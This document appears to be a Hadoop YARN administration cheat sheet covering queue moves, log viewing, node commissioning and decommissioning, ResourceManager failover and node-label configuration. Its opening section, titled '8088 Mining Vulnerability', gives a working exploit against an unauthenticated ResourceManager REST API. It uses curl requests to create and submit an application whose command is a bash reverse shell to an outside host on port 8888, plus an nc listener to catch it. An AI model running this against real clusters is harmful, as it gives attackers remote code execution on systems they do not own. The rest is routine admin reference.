Contents
  1. 8088 Mining Vulnerability
  2. Moving an Application to Another Queue
  3. Viewing Logs
  4. Node Commissioning and Decommissioning
    4.1. Commissioning
    4.2. Decommissioning
      4.2.1. yarn
  5. Active/Standby Switchover
  6. node-label
    6.1. Enabling Configuration
    6.2. Commands

8088 Mining Vulnerability

Request a new application ID:
curl -X POST http://10.33.21.190:8088/ws/v1/cluster/apps/new-application
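If the port is reachable without authentication, the response contains a freshly allocated application ID together with the cluster's maximum resource capability (values below are illustrative):
{
  "application-id": "application_1639358619460_0019",
  "maximum-resource-capability": {
    "memory": 8192,
    "vCores": 4
  }
}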

Create the application spec file 1.json containing a reverse-shell command:
{
  "application-id": "application_1639358619460_0019",
  "application-name": "get-shell",
  "am-container-spec": {
    "commands": {
      "command": "/bin/bash -i >& /dev/tcp/10.17.41.129/8888 0>&1"
    }
  },
  "application-type": "YARN"
}

Start a listener on the host the shell connects back to:
nc -lvvp 8888

Submit the application:
curl -s -i -X POST -H "Accept: application/json" -H "Content-Type: application/json" http://10.33.21.190:8088/ws/v1/cluster/apps --data-binary @1.json
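If the submission succeeds, the shell connects back to the listener and the application shows up on the ResourceManager. To verify and clean up a test run (same application ID as above):
yarn application -list -appStates RUNNING
yarn application -kill application_1639358619460_0019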

Moving an Application to Another Queue

yarn application -movetoqueue application_1667986310829_98856 -queue spark
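To confirm the move, the application status should now report the target queue (same application ID as above):
yarn application -status application_1667986310829_98856 | grep -i queue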

Viewing Logs

Yarn:
http://xx:8088/cluster?user.name=yarn
http://xx:8088/proxy/application_1660270769302_1399007
hdfs dfs -ls /spark2-history/ |grep application_1660270769302_1399007
hdfs dfs -ls /app-logs/xx/logs/application_1660270769302_3305625 |head

yarn logs -appOwner xx -applicationId application_1660270769302_3305625 -out t1
find t1 -name "*01_000001*"
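A single container's log (for example the AM container; the container ID below is illustrative) can also be fetched directly:
yarn logs -appOwner xx -applicationId application_1660270769302_3305625 -containerId container_e01_1660270769302_3305625_01_000001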

Node Commissioning and Decommissioning

Commissioning

hadoop/etc/hadoop/dfs.include
hdfs dfsadmin -refreshNodes
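A minimal sketch, assuming dfs.hosts points at dfs.include and the new node's IP is 10.17.41.134 (illustrative); refresh both the NameNode and the ResourceManager so the node can register on the HDFS and YARN side:
echo "10.17.41.134" >> hadoop/etc/hadoop/dfs.include   # illustrative new node
hdfs dfsadmin -refreshNodes
yarn rmadmin -refreshNodes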

Decommissioning

yarn

echo “10.17.41.133” > nodemanager.excludes

vi yarn-site.xml

<property>
  <name>yarn.resourcemanager.nodes.exclude-path</name>
  <value>/data/hadoop-2.8.3/etc/hadoop/nodemanager.excludes</value>
</property>

yarn rmadmin -refreshNodes -g [timeout in seconds] -client|server
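For example, a client-side graceful decommission with a one-hour timeout (timeout value is illustrative):
yarn rmadmin -refreshNodes -g 3600 -client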

The NodeManager process on the decommissioned node will shut down automatically.

Active/Standby Switchover

yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby --forcemanual rm2
yarn rmadmin -transitionToActive --forcemanual rm1
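The state of a single ResourceManager can also be queried by its ID:
yarn rmadmin -getServiceState rm1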

node-label

  • A node carries exactly one label; unlabeled nodes belong to the DEFAULT partition
  • Queues are configured with the share of each label's resources they may use
  • Only the Capacity Scheduler supports Node Labels partition scheduling
  • Labels are either exclusive or non-exclusive
    • Exclusive: the labeled resources are usable only by that partition
    • Non-exclusive: idle labeled resources can also be shared with the DEFAULT partition

Enabling Configuration

yarn-site.xml

yarn.node-labels.fs-store.root-dir|hdfs:///yarn/node-labels/
yarn.node-labels.enabled|true
yarn.node-labels.configuration-type|"centralized", "delegated-centralized" or "distributed". Default value is "centralized".

yarn.resourcemanager.scheduler.class|org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacityScheduler
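The HDFS store directory should exist and be writable by the ResourceManager before labels can be persisted; a minimal sketch, assuming the RM runs as the yarn user (path and ownership are assumptions):
hdfs dfs -mkdir -p /yarn/node-labels
hdfs dfs -chown -R yarn:yarn /yarn/node-labels
hdfs dfs -chmod -R 700 /yarn/node-labels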

capacity-scheduler.xml

<configuration>
  <property>
    <name>yarn.scheduler.capacity.root.queues</name>
    <value>default,DEMO</value>
  </property>
  <property>
    <name>yarn.scheduler.capacity.root.DEMO.capacity</name>
    <value>0</value>
  </property>
  <property>
    <name>yarn.scheduler.capacity.root.a17.maximum-applications</name>
    <value>20</value>
  </property>
  <property>
    <!-- Partitions the queue may access; comma-separated list, required -->
    <name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels</name>
    <value>DEMO</value>
  </property>
  <property>
    <!-- DEMO-partition capacity of every ancestor queue (here: root), required -->
    <name>yarn.scheduler.capacity.root.accessible-node-labels.DEMO.capacity</name>
    <value>100</value>
  </property>
  <property>
    <!-- Capacity of the queue within the DEMO partition, required -->
    <name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels.DEMO.capacity</name>
    <value>100</value>
  </property>
  <property>
    <!-- Maximum capacity of the queue within the DEMO partition, optional, defaults to 100 -->
    <name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels.DEMO.maximum-capacity</name>
    <value>100</value>
  </property>
  <property>
    <!-- Default node-label expression for container requests submitted to the queue, optional, defaults to the DEFAULT partition "" -->
    <name>yarn.scheduler.capacity.root.myqueue.default-node-label-expression</name>
    <value>DEMO</value>
  </property>
</configuration>

yarn rmadmin -refreshQueues
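After the refresh, a quick way to exercise the DEMO partition is a MapReduce example job that sets the node-label expression explicitly (jar path and queue name are assumptions):
hadoop jar $HADOOP_HOME/share/hadoop/mapreduce/hadoop-mapreduce-examples-*.jar pi \
  -Dmapreduce.job.queuename=myqueue \
  -Dmapreduce.job.node-label-expression=DEMO \
  2 10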

Commands

yarn rmadmin -addToClusterNodeLabels "label_1(exclusive=true/false),label_2(exclusive=true/false)" # exclusive by default

yarn cluster --list-node-labels

Centralized:
yarn rmadmin -replaceLabelsOnNode "hostname1[:port]=label1 hostname2=label2"

yarn node -status <NodeId>
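Labels that are no longer needed can be removed again (label names from the add command above):
yarn rmadmin -removeFromClusterNodeLabels "label_1,label_2"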